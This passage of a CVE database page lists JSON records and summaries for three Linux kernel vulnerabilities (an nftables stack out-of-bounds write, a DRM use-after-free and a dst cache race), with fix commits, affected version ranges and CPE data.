"url": "https://git.kernel.org/stable/c/28a97c43c9e32f437ebb8d6126f9bb7f3ca9521a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf39c4f77a773a547ac2bcf30ecdd303bb0c80cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7d86a77c33ba1c357a7504341172cc1507f0698"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ad7b189cc1411048434e8595ffcbe7873b71082"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d9ebfc0f21377690837ebbd119e679243e0099cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8f292322ff16b9a2272a67de396c09a50e09dce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd94d9dadee58e09b49075240fe83423eb1dcd36"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_exthdr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "28a97c43c9e32f437ebb8d6126f9bb7f3ca9521a",
"status": "affected",
"version": "49499c3e6e18b7677a63316f3ff54a16533dc28f",
"versionType": "git"
},
{
"lessThan": "cf39c4f77a773a547ac2bcf30ecdd303bb0c80cb",
"status": "affected",
"version": "49499c3e6e18b7677a63316f3ff54a16533dc28f",
"versionType": "git"
},
{
"lessThan": "a7d86a77c33ba1c357a7504341172cc1507f0698",
"status": "affected",
"version": "49499c3e6e18b7677a63316f3ff54a16533dc28f",
"versionType": "git"
},
{
"lessThan": "1ad7b189cc1411048434e8595ffcbe7873b71082",
"status": "affected",
"version": "49499c3e6e18b7677a63316f3ff54a16533dc28f",
"versionType": "git"
},
{
"lessThan": "d9ebfc0f21377690837ebbd119e679243e0099cc",
"status": "affected",
"version": "49499c3e6e18b7677a63316f3ff54a16533dc28f",
"versionType": "git"
},
{
"lessThan": "c8f292322ff16b9a2272a67de396c09a50e09dce",
"status": "affected",
"version": "49499c3e6e18b7677a63316f3ff54a16533dc28f",
"versionType": "git"
},
{
"lessThan": "fd94d9dadee58e09b49075240fe83423eb1dcd36",
"status": "affected",
"version": "49499c3e6e18b7677a63316f3ff54a16533dc28f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_exthdr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.1"
},
{
"lessThan": "4.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.132",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.54",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.5.*",
"status": "unaffected",
"version": "6.5.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.6",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.198",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.132",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.54",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.5.4",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6",
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nftables: exthdr: fix 4-byte stack OOB write\n\nIf priv-\u003elen is a multiple of 4, then dst[len / 4] can write past\nthe destination array which leads to stack corruption.\n\nThis construct is necessary to clean the remainder of the register\nin case -\u003elen is NOT a multiple of the register size, so make it\nconditional just like nft_payload.c does.\n\nThe bug was added in 4.1 cycle and then copied/inherited when\ntcp/sctp and ip option support was added.\n\nBug reported by Zero Day Initiative project (ZDI-CAN-21950,\nZDI-CAN-21951, ZDI-CAN-21961)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:18.030Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/28a97c43c9e32f437ebb8d6126f9bb7f3ca9521a"
},
{
"url": "https://git.kernel.org/stable/c/cf39c4f77a773a547ac2bcf30ecdd303bb0c80cb"
},
{
"url": "https://git.kernel.org/stable/c/a7d86a77c33ba1c357a7504341172cc1507f0698"
},
{
"url": "https://git.kernel.org/stable/c/1ad7b189cc1411048434e8595ffcbe7873b71082"
},
{
"url": "https://git.kernel.org/stable/c/d9ebfc0f21377690837ebbd119e679243e0099cc"
},
{
"url": "https://git.kernel.org/stable/c/c8f292322ff16b9a2272a67de396c09a50e09dce"
},
{
"url": "https://git.kernel.org/stable/c/fd94d9dadee58e09b49075240fe83423eb1dcd36"
}
],
"title": "netfilter: nftables: exthdr: fix 4-byte stack OOB write",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52628",
"datePublished": "2024-03-28T07:33:46.217Z",
"dateReserved": "2024-03-06T09:52:12.091Z",
"dateUpdated": "2025-11-04T17:14:07.549Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35950 (GCVE-0-2024-35950)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/client: Fully protect modes[] with dev->mode_config.mutex
The modes[] array contains pointers to modes on the connectors'
mode lists, which are protected by dev->mode_config.mutex.
Thus we need to extend modes[] the same protection or by the
time we use it the elements may already be pointing to
freed/reused memory.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35950",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T15:10:23.377799Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:42.136Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.192Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a2f957e3c4553bbb100504a1acfeaeb33f4ca4e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41586487769eede64ab1aa6c65c74cbf76c12ef0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d2dc6600d4e3e1453e3b1fb233e9f97e2a1ae949"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/18c8cc6680ce938d0458859b6a08b4d34f7d8055"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04e018bd913d3d3336ab7d21c2ad31a9175fe984"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ceb873d816786a7c8058f50d903574aff8d3764"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3eadd887dbac1df8f25f701e5d404d1b90fd0fea"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/drm_client_modeset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5a2f957e3c4553bbb100504a1acfeaeb33f4ca4e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "41586487769eede64ab1aa6c65c74cbf76c12ef0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d2dc6600d4e3e1453e3b1fb233e9f97e2a1ae949",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "18c8cc6680ce938d0458859b6a08b4d34f7d8055",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "04e018bd913d3d3336ab7d21c2ad31a9175fe984",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8ceb873d816786a7c8058f50d903574aff8d3764",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3eadd887dbac1df8f25f701e5d404d1b90fd0fea",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/drm_client_modeset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/client: Fully protect modes[] with dev-\u003emode_config.mutex\n\nThe modes[] array contains pointers to modes on the connectors\u0027\nmode lists, which are protected by dev-\u003emode_config.mutex.\nThus we need to extend modes[] the same protection or by the\ntime we use it the elements may already be pointing to\nfreed/reused memory."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:04.196Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5a2f957e3c4553bbb100504a1acfeaeb33f4ca4e"
},
{
"url": "https://git.kernel.org/stable/c/41586487769eede64ab1aa6c65c74cbf76c12ef0"
},
{
"url": "https://git.kernel.org/stable/c/d2dc6600d4e3e1453e3b1fb233e9f97e2a1ae949"
},
{
"url": "https://git.kernel.org/stable/c/18c8cc6680ce938d0458859b6a08b4d34f7d8055"
},
{
"url": "https://git.kernel.org/stable/c/04e018bd913d3d3336ab7d21c2ad31a9175fe984"
},
{
"url": "https://git.kernel.org/stable/c/8ceb873d816786a7c8058f50d903574aff8d3764"
},
{
"url": "https://git.kernel.org/stable/c/3eadd887dbac1df8f25f701e5d404d1b90fd0fea"
}
],
"title": "drm/client: Fully protect modes[] with dev-\u003emode_config.mutex",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35950",
"datePublished": "2024-05-20T09:41:45.333Z",
"dateReserved": "2024-05-17T13:50:33.134Z",
"dateUpdated": "2025-05-04T09:09:04.196Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36971 (GCVE-0-2024-36971)
Vulnerability from cvelistv5
Published
2024-06-10 09:03
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: fix __dst_negative_advice() race
__dst_negative_advice() does not enforce proper RCU rules when
sk->dst_cache must be cleared, leading to possible UAF.
RCU rules are that we must first clear sk->sk_dst_cache,
then call dst_release(old_dst).
Note that sk_dst_reset(sk) is implementing this protocol correctly,
while __dst_negative_advice() uses the wrong order.
Given that ip6_negative_advice() has special logic
against RTF_CACHE, this means each of the three ->negative_advice()
existing methods must perform the sk_dst_reset() themselves.
Note the check against NULL dst is centralized in
__dst_negative_advice(), there is no need to duplicate
it in various callbacks.
Many thanks to Clement Lecigne for tracking this issue.
This old bug became visible after the blamed commit, using UDP sockets.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 Version: a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:17.010Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/051c0bde9f0450a2ec3d62a86d2a0d2fad117f13"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/db0082825037794c5dba9959c9de13ca34cc5e72"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2295a7ef5c8c49241bff769e7826ef2582e532a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eacb8b195579c174a6d3e12a9690b206eb7f28cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81dd3c82a456b0015461754be7cb2693991421b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5af198c387128a9d2ddd620b0f0803564a4d4508"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b8af8e6118a6605f0e495a58d591ca94a85a50fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92f1655aa2b2294d0b49925f3b875a634bd3b59e"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.6:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.6"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "051c0bde9f04",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "db0082825037",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "eacb8b195579",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "5af198c38712",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2",
"status": "affected",
"version": "a87cb3e48ee8",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.6",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.19.316:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4.20",
"status": "unaffected",
"version": "4.19.316",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.4.278:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.5",
"status": "unaffected",
"version": "5.4.278",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.10.219:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.219",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.15.161:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.161",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:6.1.94:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.94",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:6.6.34:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "6.6.34",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:6.9.4:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.10",
"status": "unaffected",
"version": "6.9.4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:6.10:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "custom"
}
]
}
],
"metrics": [
{
